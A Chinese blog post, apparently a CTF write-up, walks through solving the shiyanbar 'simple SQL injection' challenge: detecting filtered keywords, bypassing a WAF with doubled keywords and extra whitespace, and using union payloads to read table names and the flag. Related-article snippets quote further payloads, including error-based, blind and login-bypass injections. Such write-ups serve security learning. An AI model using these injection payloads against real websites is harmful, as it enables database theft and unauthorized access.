实验吧三道sql注入题目解题思路以及当中至少点整理(简单的SQL注入、简单的SQL注入2、简单的SQL注入)

最新推荐文章于 2025-10-13 14:24:03 发布
原创 最新推荐文章于 2025-10-13 14:24:03 发布 · 4.1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了实验吧中的三道SQL注入题目解题过程,包括简单的SQL注入、简单的SQL注入2和简单的SQL注入3。通过尝试不同payload,作者展示了如何判断过滤字符、绕过WAF、获取表名、列名及字段数据的方法,同时总结了学习重点。

0x00

最近学习CTF有一段时间了,下面将实验吧三题题目的简单SQL注入进行一定的整理,

0x01 简单的sql注入

做题的地址为: http://ctf5.shiyanbar.com/423/web/

第一步:随便输入个数字load下url:http://ctf5.shiyanbar.com/423/web/?id=1发现是这个,老套路,既然题目提示是过滤 我们来各种试试到底过滤了什么
第二步:payload:http://ctf5.shiyanbar.com/423/web/?id=1'发现报错可以确定是字符型的注入,那来了来试试到底过滤了啥吧,尝试用payload如下:http://ctf5.shiyanbar.com/423/web/?id=1' union %23 select order by from or '1'='1,发现过滤得还挺多的基本都过 滤了,好吧来试试如何绕过吧
第三步:一般的套路绕过:内联注释、双重关键字、大小写混用、编码、。。。。。算了绕WAF的比较多,这里就不总结了改日另开新帖来说吧,这里有篇文章还不错推荐给大家:http://www.bugku.com/forum.phpmod=viewthread&tid=128&extra=page%3D1
第四步:http://ctf5.shiyanbar.com/423/web/?id=1'/**/unionunion/**/selectselect/**/table_name/**/fromfrom/**/information_schema.tables/**/wherewhere/**//**/'1'='1这 样尝试爆出表名来,居然报错,好吧 我来两个空格,估计是有个过滤函数,1'  unionunion  selectselect  table_name  fromfrom  information_schema.tables  wherewhere  '1'='1这样可以得到表,
第五步:同样可以得到列名以及字段的数据最终payload如下:
1'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1

总结:学到的知识:如何判断过滤了哪些字符;如果绕WAF

最低0.47元/天 解锁文章
网络安全CTF Web实战练习:常见Web漏洞利用与防护技巧详解-SQL注入、脚本编写及数据包分析
08-18
每个题目详细介绍了解题思路、使用的技术手段以及最终获得的flag。涉及的技术包括SQL注入及其变种(如异或注入、报错注入)、Python脚本编写、Burpsuite抓包改包、代码审计、URL编码与解码、Base64编码与解码、...
精选资源
网络安全CTF Web实战练习:基于SQL注入、Python脚本与Wireshark的数据包分析及漏洞利用技术总结
05-13
内容概要:本文档是关于CTF Web题型的总结,重介绍了在Bugku平台上的实战练习题目及其解题思路。文章分为两大部分,涵盖了从简单SQL注入到复杂的日志审计和Wireshark分析等多种Web安全挑战。每个题目不仅提供了...
pikachu sql注入题解
L1ni01
07-17 550
第一关.数字型注入(post) 首先我们介绍一下数字型和字符型的sql注入 sql注入大致也可分为数字型和字符型 如何判断是数字型还是字符型呢 数字型判断: 当输入的参 x 为整型时,通常 abc.php 中 Sql 语句类型大致如下: select * from <表名> where id = x 这种类型可以使用经典的 and 1=1 和 and 1=2 来判断: Url 地址中输入 http://xxx/abc.php?id= x and 1=1 页面依旧运行正常,继续进行下一步
sql注入(基础)题解
agoodboy6的博客
11-04 397
上述语句的结构,可以将information-schema.schemata/tables/columns看作所要查询的范围,而where后的语句作为上一步语句查询获取的信息又使得此步查询更加准确。原理:在SQL注入攻击过程中,服务器开启了错误回显,页面会返回错误信息,利用报错函数获取数据库数据。select * from member where id='$id' 字符型sql语句。初次尝试,发现显示结果不全,推测此题对回显长度有限制。table-name与table-name呼应。
最新SQL 三种注入方式详解,零基础入门到精通,收藏这一篇就够了
最新发布
分享Python知识
10-13 522
广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节,是应对复杂攻防挑战的实用指南。SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。因此,网络安全领域的薪资近年来也呈现稳步增长的态势。
实验吧Web-易-简单sql注入之3(报错的sql盲注之exp)
Sea_Sand息禅
12-18 444
题目提示是报错注入,于是就用盲注技巧来注入。 这里注入时发现floor,extractvalue,updatexml被吃掉了,用exp可以注入成功。(记住大小写绕过等技巧) 1.爆库 ' or exp(~(select * from(select database())a))# 这里最后面的a处可为别的字母,且必须要有 可以看到库名为web1。 2,爆表 ' or exp(~(...
实验简单SQL注入1,简单SQL注入
weixin_30770783的博客
05-07 232
接上面一篇博客。 实验简单sql注入1 题目连接 http://ctf5.shiyanbar.com/423/web/ 同样,直接输入 1加个但引号,结果下面有返回错误, , 有错,所以估计这里应该是要闭合,字符行注入,但是这个标题,到底过滤了什么,目前我还不知道过滤了什么,所以先搞一下。。 输入 1' and 1=1# 按理...
实验吧 登陆一下好吗?? 简单注入 By Assassin
Assassin
01-30 6448
题目想法挺简单的,是时候学习一下注入的套路了,真的要不简单的也想不到。发现* / select union or 都被过滤了,一开始想的太复杂了,以为是个什么waf过滤什么的,但是看了pcat前辈的WP发现真的很基础吧。但是and ‘什么的都没有过滤!payload真的简单到淫荡,看一下就是这样的 admin-> ‘=’ password-> ‘=’ 真是醉了,为
CTF-Show-SQL注入系列
2401_88326655的博客
12-12 1169
我们可以采用mysql中的replace函数绕过,将0-9数字替换成不同的字符,从而绕过。flag是包含数字的,因此我们需要将flag中的数字进行替换,从而将flag显示出来。将上述payload放在远端执行,burp抓包,进行url编码,填入id参数中。换句话来说,当username字段的值不为flag时,才可以进行显示。我们发现,sql语句中字段加反引号可以代替空格,得到的结果一样正确。使用上一题的payload,发现不行。我们将flag替换成1,那么就绕过了。我们输入id,就可以查询到用户。
CTF-Web学习笔记:SQL注入
Deng7326的博客
07-28 1367
本文系统梳理了CTF竞赛中SQL注入的核心原理与实战技巧。首先介绍了SQL注入的基础概念和成因,即用户输入数据被直接拼接到SQL语句中执行。其次分类解析了CTF常见的注入类型,包括数字/字符串型注入、报错/盲注/联合查询等攻击方式。文章重分享了实战经验:如何判断注入、确定数据库类型、使用工具辅助及绕过WAF防御。最后通过一道报错注入题目,详细演示了从数据库名获取到最终拿Flag的完整解题流程,并推荐了SQLiLabs等练习平台。
sql注入之盲注
A1956936030的博客
09-23 430
一.布尔型盲注 题目题目sqllab-less-8 1.(1)正常页面回显 ?id=1 and 1=1 (2)页面出错 ?id=1' and 1=2 2.先判断数据库长度 ?id=0' or length(database())>7--+ true ?id=0' or length(database())>8--+ false ?id=0' or length(database())=8--+ true 最后确认数据库长度为8 3.猜库名 此时我们需要
SQL注入题1
慢慢变小佬的博客
07-06 872
service mysql start;mysql -u root -q;use mysql;show databases;id=1 order by 3 判断列数id =-1 union select 1,2,3 判断出现位数id=-1 union select 1,use(),database() 查询数据库名id=-1 union select 1,(select table_name fr...
SQL手工注入漏洞测试(Sql Server数据库)解题思路小记
Routine_limon的博客
07-14 376
靶环境:IIS+ASP+Sql Server,Aspx代码对客户端提交的参数未做任何过滤。 解题目标: 手工进行SQL注入测试,获取管理密码登录。 使用sqlmap获取数据库中的表名和字段名;如图: 通过:sqlmap.py -u http://219.153.49.228:48753/new_list.asp?id=2 --dbs 获取数据库中的表名 sqlmap.py -u http://2...
SQL注入解题方法------更正
2302_79556885的博客
03-08 430
通过抓包看有无关键词过滤(有的时候过滤了也有回显)常见的有空格过滤,关键单词过滤,逗号过滤,单引号过滤,and过滤(相关具体内容,博主近期会专门出一期来讲各种过滤的绕过方法)判断是数字注入还是字符注入?
简单sql注入学习
weixin_33807284的博客
08-26 158
sql注入是什么? 所谓SQL注入,就是通过把SQL命令插入到Web表单提 交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据 库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。比如先前的很多影视网站泄露VIP...
ctf题库--简单sql注入
miko2018的博客
08-21 6145
&lt;题目&gt; mysql报错注入 格式:flag{} 解题链接: http://ctf5.shiyanbar.com/web/index_3.php &lt;解答&gt; 1.打开题目链接,在查询中输入1,发现地址栏变化。 2.认为这里可能(看题目其实知道是一定)存在一个sql注入。 3.使用工具sqlmap进行注入(以该地址栏id值为例)。 查看当前数据库: Sqlmap -u "...
简单sql注入——实验
weixin_34290631的博客
07-11 539
刚刚做了实验吧的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! 永远爱你们的————新宝宝 简单sql注入分值:10 来源:实验吧 难度:中 参与人数:18007人 Get Flag:5644人 答题人数:651...
sql注入(入门级)sql闯关思路
认真走好每一小步
06-23 552
通过操纵SQL语句,使得应用程序在数据库上执行攻击者指定的恶意SQL语句的一种攻击方式。攻击者可以通过应用程序的输入界面,如表单、URL参数等方式,将恶意的SQL代码注入到应用程序中,从而访问,修改,删除甚至控制数据库内的数据和系统。
网络安全--最简单sql注入
nuoman_cheng的博客
11-10 1203
我们平常见到的输入框: 如果用户输入: 用户名:user1 or '1'='1' 密码   : passwd1 or '1'='1' 那么,SQl会产生为: select * from  ziliao  where  username=user1 or '1'='1'  and  password = passwd1 or '1'='1' 后面的条件就永远为真,就绕过去
ctf sql注入题目讲解
08-10
在CTF(Capture The Flag)比赛中,SQL注入是一种常见的Web安全挑战类型,通常涉及对数据库的非法操作以获取...通过以上方法,参赛者可以在CTF比赛中更有效地解决SQL注入题目。掌握这些技巧需要不断练习和总结经验。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值